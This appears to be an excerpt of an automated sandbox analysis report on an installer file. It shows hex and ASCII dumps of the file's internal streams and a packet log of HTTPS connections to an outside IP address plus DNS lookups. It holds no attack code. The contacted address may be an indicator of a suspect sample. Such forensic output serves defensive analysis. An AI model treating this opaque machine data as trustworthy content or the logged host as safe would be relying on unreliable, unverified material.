                                                                                                                                              Data Raw:07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2c 00 2c 00 31 00 31 00 35 00 35 00 35 00 35 00 35 00 35 00 3b 00 3b 00 3b 00 43 00 43 00 47 00 47 00 47 00 47 00 47 00 57 00 57 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 6b 00 6b 00 6f 00 6f 00 6f 00 6f 00 6f 00 6f 00 6f 00 6f 00 7d 00 7d 00 80 00
                                                                                                                                              Stream Path: \x18496\x16191\x17783\x17516\x15210\x17892\x18468, File Type: ASCII text, with very long lines, with no line terminators, Stream Size: 14349
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16191\x17783\x17516\x15210\x17892\x18468
                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                              Stream Size:14349
                                                                                                                                              Entropy:5.19584234172
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:N a m e T a b l e T y p e C o l u m n P r o p e r t y I d _ V a l i d a t i o n _ S u m m a r y I n f o r m a t i o n S e t D e s c r i p t i o n C a t e g o r y K e y C o l u m n M a x V a l u e N u l l a b l e K e y T a b l e M i n V a l u e N V a l u e I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y
                                                                                                                                              Data Raw:4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 50 72 6f 70 65 72 74 79 49 64 5f 56 61 6c 69 64 61 74 69 6f 6e 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 53 65 74 44 65 73 63 72 69 70 74 69 6f 6e 43 61 74 65 67 6f 72 79 4b 65 79 43 6f 6c 75 6d 6e 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 54 61 62 6c 65 4d 69 6e 56 61 6c 75 65 4e 56 61 6c 75 65
                                                                                                                                              Stream Path: \x18496\x16191\x17783\x17516\x15978\x17586\x18479, File Type: data, Stream Size: 1700
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16191\x17783\x17516\x15978\x17586\x18479
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:1700
                                                                                                                                              Entropy:3.38109274787
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . ' . . . . . . . . . . . . . . . . . . . C . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . . . . . ( . . . . . . . 5 . . . . . . . . . . . ' . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . . ' . . . . . . .
                                                                                                                                              Data Raw:00 00 00 00 04 00 0c 00 05 00 04 00 00 00 00 00 04 00 04 00 06 00 02 00 0a 00 01 00 0b 00 15 00 13 00 02 00 03 00 02 00 0b 00 08 00 08 00 02 00 09 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 01 00 50 00 05 00 05 00 0a 00 27 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 43 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 14 00
                                                                                                                                              Stream Path: \x18496\x16255\x16740\x16943\x18486, File Type: data, Stream Size: 58
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16255\x16740\x16943\x18486
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:58
                                                                                                                                              Entropy:3.42899049756
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . " . ) . * . + . , . 1 . 5 . ; . C . G . W . \\ . k . o . } . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:07 00 22 00 29 00 2a 00 2b 00 2c 00 31 00 35 00 3b 00 43 00 47 00 57 00 5c 00 6b 00 6f 00 7d 00 80 00 81 00 82 00 85 00 91 00 9c 00 a6 00 a9 00 b4 00 c9 00 d2 00 e4 00 f5 00
                                                                                                                                              Stream Path: \x18496\x16383\x17380\x16876\x17892\x17580\x18481, File Type: data, Stream Size: 3528
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16383\x17380\x16876\x17892\x17580\x18481
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:3528
                                                                                                                                              Entropy:2.45199312888
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . , . , . 1 . 1 . 5 . 5 . 5 . 5 . 5 . 5 . ; . ; . ; . C . C . G . G . G . G . G . W . W . \\ . \\ . \\ . \\ . \\ . \\ . \\ . \\ . k . k . o . o . o . o . o . o . o . o . } . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 07 00 08 00 08 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2c 00 2c 00 31 00 31 00 35 00 35 00 35 00 35 00 35 00 35 00 3b 00 3b 00 3b 00 43 00 43 00 47 00 47 00 47 00 47 00 47 00 57 00 57 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 5c 00 6b 00 6b 00 6f 00 6f 00 6f 00 6f 00 6f 00 6f 00 6f 00 6f 00 7d 00
                                                                                                                                              Stream Path: \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481, File Type: data, Stream Size: 8
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:8
                                                                                                                                              Entropy:2.0
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:a . c . b . d .
                                                                                                                                              Data Raw:61 01 63 01 62 01 64 01
                                                                                                                                              Stream Path: \x18496\x16786\x17522, File Type: x86 executable (TV), Stream Size: 4
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16786\x17522
                                                                                                                                              File Type:x86 executable (TV)
                                                                                                                                              Stream Size:4
                                                                                                                                              Entropy:1.5
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:I . . .
                                                                                                                                              Data Raw:49 01 01 00
                                                                                                                                              Stream Path: \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 48
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:48
                                                                                                                                              Entropy:3.56923567776
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . < . . . . .
                                                                                                                                              Data Raw:02 01 03 01 04 01 05 01 06 01 07 01 08 01 09 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 78 85 dc 85 3c 8f a0 8f c8 99
                                                                                                                                              Stream Path: \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 24
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:24
                                                                                                                                              Entropy:3.0535088548
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:02 01 03 01 04 01 0a 01 00 00 00 00 00 00 00 00 20 83 84 83 e8 83 14 85
                                                                                                                                              Stream Path: \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 42
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:42
                                                                                                                                              Entropy:3.38624972305
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . .
                                                                                                                                              Data Raw:02 01 04 01 05 01 06 01 09 01 0b 01 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 83 e8 83 78 85 dc 85 c8 99 9c 98 00 99
                                                                                                                                              Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 16
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:16
                                                                                                                                              Entropy:2.0
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:: . : . : . : . . . . . . . . .
                                                                                                                                              Data Raw:3a 01 3a 01 3a 01 3a 01 13 01 16 01 1a 01 1e 01
                                                                                                                                              Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:16
                                                                                                                                              Entropy:2.05242128383
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:: . . . : . . . . . . . . . . .
                                                                                                                                              Data Raw:3a 01 00 00 3a 01 00 00 02 80 01 80 00 00 00 80
                                                                                                                                              Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16918\x17191\x18468
                                                                                                                                              File Type:MIPSEB Ucode
                                                                                                                                              Stream Size:14
                                                                                                                                              Entropy:2.11796317531
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . e . . . . .
                                                                                                                                              Data Raw:01 80 eb 03 00 80 00 00 65 01 00 00 00 00
                                                                                                                                              Stream Path: \x18496\x16923\x15722\x16818\x17892\x17778, File Type: data, Stream Size: 20
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16923\x15722\x16818\x17892\x17778
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:20
                                                                                                                                              Entropy:2.64643934467
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:0e 01 10 01 02 80 02 80 85 01 87 01 86 01 86 01 02 80 02 80
                                                                                                                                              Stream Path: \x18496\x16923\x17194\x17910\x18229, File Type: data, Stream Size: 48
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16923\x17194\x17910\x18229
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:48
                                                                                                                                              Entropy:3.1603641405
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:y . | . . . . . . . . . . . . . z . z . . . . . { . } . . . . . . . ~ . . . . . . . . . . . . .
                                                                                                                                              Data Raw:79 01 7c 01 7f 01 82 01 00 80 00 80 00 80 02 80 7a 01 7a 01 80 01 83 01 7b 01 7d 01 00 00 00 00 00 00 7e 01 81 01 84 01 16 01 16 01 16 01 1a 01
                                                                                                                                              Stream Path: \x18496\x16924\x17958\x16949\x16728\x16941\x17894\x18486, File Type: data, Stream Size: 14
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16924\x17958\x16949\x16728\x16941\x17894\x18486
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:14
                                                                                                                                              Entropy:2.6644977792
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . C . . . . . . . . . . .
                                                                                                                                              Data Raw:15 01 43 00 88 01 89 01 00 00 00 90 13 01
                                                                                                                                              Stream Path: \x18496\x16924\x18037\x16812\x15144\x17522\x17193\x18474, File Type: data, Stream Size: 24
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16924\x18037\x16812\x15144\x17522\x17193\x18474
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:24
                                                                                                                                              Entropy:2.29597512699
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:8a 01 1a 01 01 80 8b 01 8b 01 8c 01 01 00 00 80 00 00 00 80 00 00 00 00
                                                                                                                                              Stream Path: \x18496\x16924\x18037\x16812\x15144\x17522\x17783\x17394, File Type: data, Stream Size: 12
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16924\x18037\x16812\x15144\x17522\x17783\x17394
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:12
                                                                                                                                              Entropy:2.62581458369
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . .
                                                                                                                                              Data Raw:c9 00 8a 01 a3 80 00 00 01 80 1a 01
                                                                                                                                              Stream Path: \x18496\x16924\x18037\x16812\x15528\x17841\x16695\x17391, File Type: data, Stream Size: 32
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x16924\x18037\x16812\x15528\x17841\x16695\x17391
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:32
                                                                                                                                              Entropy:2.31714386632
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:d2 00 8a 01 00 00 10 00 00 80 02 00 00 80 01 00 00 80 8d 01 00 00 00 00 00 00 8e 01 1a 01 00 00
                                                                                                                                              Stream Path: \x18496\x17163\x16689\x18229, File Type: 0421 Alliant compact executable, Stream Size: 8
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17163\x16689\x18229
                                                                                                                                              File Type:0421 Alliant compact executable
                                                                                                                                              Stream Size:8
                                                                                                                                              Entropy:1.75
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . .
                                                                                                                                              Data Raw:11 01 12 01 01 00 01 00
                                                                                                                                              Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 30
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:30
                                                                                                                                              Entropy:2.70496204858
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . 1 . 3 . 5 . 1 . 5 . 3 . . . 3 . . . . . 4 . 6 . 4 .
                                                                                                                                              Data Raw:15 01 18 01 31 01 33 01 35 01 31 01 35 01 33 01 00 00 33 01 a2 01 a1 01 34 01 36 01 34 01
                                                                                                                                              Stream Path: \x18496\x17167\x16943, File Type: PDP-11 overlaid separate executable not stripped, Stream Size: 220
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17167\x16943
                                                                                                                                              File Type:PDP-11 overlaid separate executable not stripped
                                                                                                                                              Stream Size:220
                                                                                                                                              Entropy:3.93446944589
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . ! . ( . > . @ . B . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ; . G . H . D . ? . A . C . F . . . . . . . . z . . P b . . P b . . P . . . . T . . . . . . . . . . . . . . . . . . . . . . } . . . < . < . < . < . < . < . < . . . . . . . . . = . = . = . = . = . = . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:19 01 1d 01 21 01 28 01 3e 01 40 01 42 01 45 01 a3 01 a5 01 a7 01 16 01 1a 01 1e 01 16 01 16 01 16 01 16 01 16 01 16 01 16 01 16 01 3b 01 47 01 48 01 44 01 3f 01 41 01 43 01 46 01 a4 01 a6 01 a8 01 00 7a 00 80 50 62 01 80 50 62 01 80 50 80 08 80 00 54 02 80 00 94 06 80 00 1c 1b 80 0a 01 00 80 1a a0 00 80 be 08 00 80 7d 03 00 80 3c 01 3c 01 3c 01 3c 01 3c 01 3c 01 3c 01 00 00 00 00
                                                                                                                                              Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 204
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:204
                                                                                                                                              Entropy:4.82293205054
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:+ . . . . . . . . . . . . . . . . . . . " . # . & . ' . * . + . . . J . K . L . M . N . O . Q . R . S . T . U . V . W . X . Y . Z . \\ . . . . . . . . . . . . . . . . . . . . . . . ^ . [ . ` . _ . ] . _ . . . . . . . . . . . P . P . . . . . . . . . . . P . P . . . . . . . 2 . . . . . . x . . . . . . . . . . . . . . . 3 . . . . . . . . . . . d . . . @ . . . l . . . ( . . . . . t . . . . . . . p . . . . .
                                                                                                                                              Data Raw:2b 00 02 01 03 01 04 01 05 01 06 01 08 01 09 01 0b 01 0c 01 22 01 23 01 26 01 27 01 2a 01 2b 01 2e 01 4a 01 4b 01 4c 01 4d 01 4e 01 4f 01 51 01 52 01 53 01 54 01 55 01 56 01 57 01 58 01 59 01 5a 01 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 01 5b 01 60 01 5f 01 5d 01 5f 01 00 00 00 00 00 00 00 00 00 00 50 01 50 01 00 00 00 00 00 00 00 00 00 00 50 01
                                                                                                                                              Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 54
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:54
                                                                                                                                              Entropy:3.70357119075
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:+ . . . . . . . . . & . J . K . L . . . . . . . . . . . [ . . . . . . . 2 . . . . . . . . 3 . . . d . . .
                                                                                                                                              Data Raw:2b 00 02 01 03 01 04 01 0a 01 26 01 4a 01 4b 01 4c 01 00 00 00 00 00 00 00 00 00 00 5b 01 00 00 00 00 00 00 32 80 20 83 84 83 e8 83 14 85 33 80 19 80 64 80 bc 82
                                                                                                                                              Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 48
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:48
                                                                                                                                              Entropy:3.17952423505
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! .
                                                                                                                                              Data Raw:13 01 16 01 1a 01 1e 01 14 01 9e 01 9f 01 a0 01 15 01 18 01 18 01 18 01 00 80 00 80 00 80 00 80 00 00 00 00 1c 01 20 01 00 00 19 01 1d 01 21 01
                                                                                                                                              Stream Path: \x18496\x17610\x16179\x16680\x16821\x18475, File Type: data, Stream Size: 8
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17610\x16179\x16680\x16821\x18475
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:8
                                                                                                                                              Entropy:2.0
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . .
                                                                                                                                              Data Raw:0d 01 0f 01 0e 01 10 01
                                                                                                                                              Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: Alpha u-code object, Stream Size: 64
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                                                                                                              File Type:Alpha u-code object
                                                                                                                                              Stream Size:64
                                                                                                                                              Entropy:2.92024782944
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . . . . . . . < . . . . . . . . . < . q . q . q . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:8f 01 93 01 99 01 99 01 90 01 90 01 3c 01 90 01 91 01 91 01 91 01 3c 01 71 01 71 01 71 01 71 01 00 01 00 80 00 01 00 80 00 00 00 80 00 02 00 80 00 00 00 00 00 00 00 00 92 01 94 01 96 01 95 01
                                                                                                                                              Stream Path: \x18496\x17740\x16680\x16951\x17551\x16879\x17768, File Type: data, Stream Size: 4
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17740\x16680\x16951\x17551\x16879\x17768
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:4
                                                                                                                                              Entropy:1.5
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . .
                                                                                                                                              Data Raw:15 01 13 01
                                                                                                                                              Stream Path: \x18496\x17742\x17589\x18485, File Type: data, Stream Size: 12
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17742\x17589\x18485
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:12
                                                                                                                                              Entropy:2.79248125036
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . . . 7 . 8 . 9 .
                                                                                                                                              Data Raw:b0 e3 b1 e3 b2 e3 37 01 38 01 39 01
                                                                                                                                              Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 60
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:60
                                                                                                                                              Entropy:3.4921997813
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:. . . . f . g . i . j . l . n . p . r . s . u . w . . . . . . . . . I . h . h . k . m . . . q . . . < . v . x . . . . .
                                                                                                                                              Data Raw:f6 00 1c 01 66 01 67 01 69 01 6a 01 6c 01 6e 01 70 01 72 01 73 01 75 01 77 01 9a 01 9c 01 99 01 9d 01 49 01 68 01 68 01 6b 01 6d 01 97 01 71 01 98 01 3c 01 76 01 78 01 9b 01 98 01
                                                                                                                                              Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 132
                                                                                                                                              General
                                                                                                                                              Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:132
                                                                                                                                              Entropy:3.16655606323
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:" . # . & . ' . * . + . , . - . . . / . 0 . 3 . A . . . . . . . . . . . . . . . . . . . # . . . . . ( . . . . . . . . . . . . . . . $ . % . & . ) . * . + . , . - . . . / . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:22 01 23 01 26 01 27 01 2a 01 2b 01 2c 01 2d 01 2e 01 2f 01 30 01 33 80 41 8c 01 81 d2 84 01 80 01 80 01 ac 01 ad 01 80 01 8c 01 8d 23 01 12 01 11 01 28 01 12 01 12 01 12 01 12 01 12 01 12 01 12 01 24 01 25 01 26 01 29 01 2a 01 2b 01 2c 01 2d 01 2e 01 2f 01 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Feb 19, 2021 12:30:59.367336988 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:30:59.422338963 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:59.422439098 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:00.169872046 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:00.229110003 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:00.273072958 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:00.460808992 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:00.521356106 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:00.521442890 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:00.521548986 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:02.960891962 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:03.017874002 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:03.070158005 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:06.211194992 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:06.316153049 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:25.192639112 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:25.192742109 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:25.192765951 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:25.246118069 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:25.246160984 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:25.246189117 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:25.251804113 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:25.259644985 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:31:25.358362913 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:32:25.322995901 CET4434970551.77.118.172192.168.2.3
                                                                                                                                              Feb 19, 2021 12:32:25.324532032 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:32:25.374089003 CET49705443192.168.2.351.77.118.172
                                                                                                                                              Feb 19, 2021 12:32:25.427707911 CET4434970551.77.118.172192.168.2.3

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Feb 19, 2021 12:30:47.295387030 CET6493853192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:47.355587006 CET53649388.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:48.472724915 CET6015253192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:48.532927990 CET53601528.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:53.117769957 CET5754453192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:53.166599035 CET53575448.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:55.689011097 CET5598453192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:55.740571022 CET53559848.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:57.106626987 CET6418553192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:57.155581951 CET53641858.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:58.443476915 CET6511053192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:58.505333900 CET53651108.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:59.070993900 CET5836153192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:59.132529020 CET53583618.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:30:59.191792011 CET6349253192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:30:59.249202967 CET53634928.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:00.031013012 CET6083153192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:00.091252089 CET53608318.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:00.835037947 CET6010053192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:00.884326935 CET53601008.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:02.113915920 CET5319553192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:02.162731886 CET53531958.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:02.980592012 CET5014153192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:03.031081915 CET53501418.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:03.808082104 CET5302353192.168.2.38.8.8.8
                                                                                                                                              Feb 19, 2021 12:31:03.856976032 CET53530238.8.8.8192.168.2.3
                                                                                                                                              Feb 19, 2021 12:31:04.962714911 CET4956353192.168.2.38.8.8.8
